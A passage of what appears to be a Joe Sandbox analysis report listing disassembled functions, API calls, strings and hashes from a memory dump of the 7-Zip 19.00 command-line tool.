                                                                                                                                                                                                • Opcode Fuzzy Hash: 715b52d3456352f88bffa419932dca49956056468a6bc82701705f4594a5e09d
                                                                                                                                                                                                • Instruction Fuzzy Hash: A3813C33619BC482CA64DF26E450BAE67A4FBDAB84F519052EB8E53B15CF38C486C704
                                                                                                                                                                                                Function 009872C8 Relevance: 25.1, APIs: 20, Instructions: 81COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                                                                                • Instruction ID: ac26bf7fe79c24ae010b8b58ac6411de4ca35d553fdc7d94bb577ad637eae7f1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A31D62261998085CA19FF36DC517AC7360FFCAF94F990172AF2D5B369CE20C8828354
                                                                                                                                                                                                Function 0097DCB0 Relevance: 22.8, APIs: 10, Strings: 5, Instructions: 323COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID: 2$3$?$?$Z
                                                                                                                                                                                                • API String ID: 1534225298-3338962022
                                                                                                                                                                                                • Opcode ID: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                                                                                                                                                • Instruction ID: f32efddfb15dfa3875fac7e67982422442f5986894359b29048618e604f2796e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 45C1B7332196C492CB30DB25D881A6F7735FBD9B84F908612E79E43B69DE38C945C701
                                                                                                                                                                                                Function 00953AFC Relevance: 21.4, APIs: 17, Instructions: 169COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                                                                                                                                                • Instruction ID: 9bf4031e77f9b1f4cc666c2d3e958f88dc88342771b499808c9315822aa2cdb4
                                                                                                                                                                                                • Opcode Fuzzy Hash: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                                                                                                                                                • Instruction Fuzzy Hash: 31510A23702A8489CB19EF36D4A466D6324FFC6FD5B598172EE1E1B718CF24C9498350
                                                                                                                                                                                                Function 0097D998 Relevance: 21.2, APIs: 13, Strings: 1, Instructions: 197COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$wcscmp
                                                                                                                                                                                                • String ID: ..\
                                                                                                                                                                                                • API String ID: 4021281200-2756224523
                                                                                                                                                                                                • Opcode ID: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                                                                                                                                                • Instruction ID: ebae3ef302a89127aa45966a700deb791bbea68ffded5d30e46a7a038b7f763d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                                                                                                                                                • Instruction Fuzzy Hash: B9615B23719A8086CA24EF16E49171EA774FFD9B94F998121EF4E1B758DF79C842C700
                                                                                                                                                                                                Function 00980B2C Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$free$fputc
                                                                                                                                                                                                • String ID: Modified: $Path: $Size:
                                                                                                                                                                                                • API String ID: 2662072562-3207571042
                                                                                                                                                                                                • Opcode ID: baf16f6fc6d4a04671d563c07444ec4426631ca8bc597a177c284f797b747402
                                                                                                                                                                                                • Instruction ID: 67eea00026e5c0e383cce622946cd662ca349cadb367350f569016d36a5116e2
                                                                                                                                                                                                • Opcode Fuzzy Hash: baf16f6fc6d4a04671d563c07444ec4426631ca8bc597a177c284f797b747402
                                                                                                                                                                                                • Instruction Fuzzy Hash: 39212E6630490181DE11EF26E96076D2321FBD6FECF849226EE6D077AADF28C51AC300
                                                                                                                                                                                                Function 0094BF04 Relevance: 20.3, APIs: 16, Instructions: 327COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: b4b88fefa1dc8cc45d876b51e8a403cde685ba7d07cf5a0b4bc54341fa2cdd8b
                                                                                                                                                                                                • Instruction ID: 50b5785055f475b939c9308e011ead5c71f6650c6f316de030416ae43b5f8dd1
                                                                                                                                                                                                • Opcode Fuzzy Hash: b4b88fefa1dc8cc45d876b51e8a403cde685ba7d07cf5a0b4bc54341fa2cdd8b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 89C1946731958096CB20EF35E490A6EA370F7C9B80F904522FB9E63B29DF39C945CB00
                                                                                                                                                                                                Function 00950998 Relevance: 19.6, APIs: 12, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove$ExceptionThrow
                                                                                                                                                                                                • String ID: Incorrect volume size:
                                                                                                                                                                                                • API String ID: 3957182552-1799541332
                                                                                                                                                                                                • Opcode ID: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                                                                                                                                                • Instruction ID: 9e359ed5a5caadaebd19c2b64a28a6a57eb533c05f46dd44d5afe6ceef62e46e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                                                                                                                                                • Instruction Fuzzy Hash: 04517D72204AC492DF24EF26D8907ADB360F7C5B84F848122EF9D477A5DF28C589C740
                                                                                                                                                                                                Function 00957178 Relevance: 19.0, APIs: 15, Instructions: 200COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: f4d9c5df7f8b7d7a50d10b176def1ac906b2dbe33b2ad29e85ea175187436e74
                                                                                                                                                                                                • Instruction ID: 74bd053117764b197becf23f2a669f98a8c921995959f92e99c0c1d9050aee9b
                                                                                                                                                                                                • Opcode Fuzzy Hash: f4d9c5df7f8b7d7a50d10b176def1ac906b2dbe33b2ad29e85ea175187436e74
                                                                                                                                                                                                • Instruction Fuzzy Hash: E0713E2220CA4081DB24EF66F85076DA7A5FBC9BD5F445122BF5E87765DF28C68AC340
                                                                                                                                                                                                Function 0094A8A0 Relevance: 18.2, APIs: 10, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0094339C: free.MSVCRT ref: 009433D7
                                                                                                                                                                                                  • Part of subcall function 0094339C: memmove.MSVCRT(00000000,?,?,00000000,009410A8), ref: 009433F2
                                                                                                                                                                                                • free.MSVCRT ref: 0094A90A
                                                                                                                                                                                                • free.MSVCRT ref: 0094A9AD
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID: /$\
                                                                                                                                                                                                • API String ID: 1534225298-1600464054
                                                                                                                                                                                                • Opcode ID: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                                                                                                                                                • Instruction ID: 454be20d4275dac885db28e62f9cea5b8523fb42cb773bad292ac2172971f187
                                                                                                                                                                                                • Opcode Fuzzy Hash: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C512822258640A0CE24FF21D551EBE6375FFC67D4B809122BB4F47766EF28C98AC702
                                                                                                                                                                                                Function 009885C7 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 00988630
                                                                                                                                                                                                • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 00988640
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$fputs$memmove
                                                                                                                                                                                                • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                                                                                                                                                • API String ID: 2337578458-4238946813
                                                                                                                                                                                                • Opcode ID: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                                                                                                                                                • Instruction ID: 6e6ffd159a30518ade247c04605cc7af29fba62051f6d469289fcb85c33ea5f2
                                                                                                                                                                                                • Opcode Fuzzy Hash: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F116D633056C096DA20EF15E99076EB322FBCABD4F948022DB5D17719DF38C896C711
                                                                                                                                                                                                Function 0094FEC8 Relevance: 16.6, APIs: 8, Strings: 3, Instructions: 146COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Cannot find listfile, xrefs: 0094FF12
                                                                                                                                                                                                • The file operation error for listfile, xrefs: 0094FF71
                                                                                                                                                                                                • Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 0094FFDA, 0095000E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ExceptionThrow
                                                                                                                                                                                                • String ID: Cannot find listfile$Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
                                                                                                                                                                                                • API String ID: 4001284683-1604901869
                                                                                                                                                                                                • Opcode ID: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                                                                                                                                                • Instruction ID: e55fdea6a09d8988c2e77b4eff97164ecbf2f155ca097f8e81429d2368da9595
                                                                                                                                                                                                • Opcode Fuzzy Hash: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F51B47231868592CA10EF26E89079FA721F7D67D4F900116EF9913BA9DF68C909CB00
                                                                                                                                                                                                Function 00947524 Relevance: 16.4, APIs: 13, Instructions: 153COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 408039514-0
                                                                                                                                                                                                • Opcode ID: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                                                                                                                                                • Instruction ID: fa31f2d01968162250204913c992327b5b71172b514fa81c05ef42878ad10f94
                                                                                                                                                                                                • Opcode Fuzzy Hash: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9951883261C94492DA20EF65E491F6EE760FFC5790F901212B79E43679DF68CD86CB10
                                                                                                                                                                                                Function 00983148 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 52COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs
                                                                                                                                                                                                • String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
                                                                                                                                                                                                • API String ID: 1795875747-2836439314
                                                                                                                                                                                                • Opcode ID: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                                                                                • Instruction ID: f484d7ff51ca8505a8f194b3d3fc34bd978961666797cb99faf30fe64e92bf8c
                                                                                                                                                                                                • Opcode Fuzzy Hash: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C1190B630495096FB25EF26E9587596720F74AFC4F44D026CF4803B65DF38CAA9C300
                                                                                                                                                                                                Function 009865D0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$free
                                                                                                                                                                                                • String ID: $ MB$ Memory =
                                                                                                                                                                                                • API String ID: 3873070119-2616823926
                                                                                                                                                                                                • Opcode ID: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                                                                                                                                                                                • Instruction ID: 14c49fad0b7b823293b271fb8562d94e613d14f02b771c06407d3537958f6e21
                                                                                                                                                                                                • Opcode Fuzzy Hash: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                                                                                                                                                                                • Instruction Fuzzy Hash: D11121B230094191EB10DF29E95435A2330F78ABE5F44A222EE6E477B5DF38C959C700
                                                                                                                                                                                                Function 009830CC Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 32COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 009830E7
                                                                                                                                                                                                • fputs.MSVCRT ref: 00983104
                                                                                                                                                                                                • fputs.MSVCRT ref: 00983114
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 0094237E
                                                                                                                                                                                                  • Part of subcall function 00942320: fputs.MSVCRT ref: 009423B8
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 009423C4
                                                                                                                                                                                                • fputs.MSVCRT ref: 00983132
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$free
                                                                                                                                                                                                • String ID: : Can not open the file as [$ERROR$Open $WARNING$] archive
                                                                                                                                                                                                • API String ID: 3873070119-2741933734
                                                                                                                                                                                                • Opcode ID: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                                                                                • Instruction ID: 97b07b7e20d3764a92469ba6ad79872fb390e4cecf450a511b350a22a3b64d1c
                                                                                                                                                                                                • Opcode Fuzzy Hash: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 49F01D65341E0591EE11DF6AE8A479A6331BB5AFC9F84E026DE5E03366DE2CC549C300
                                                                                                                                                                                                Function 0097EE5C Relevance: 15.3, APIs: 12, Instructions: 344COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
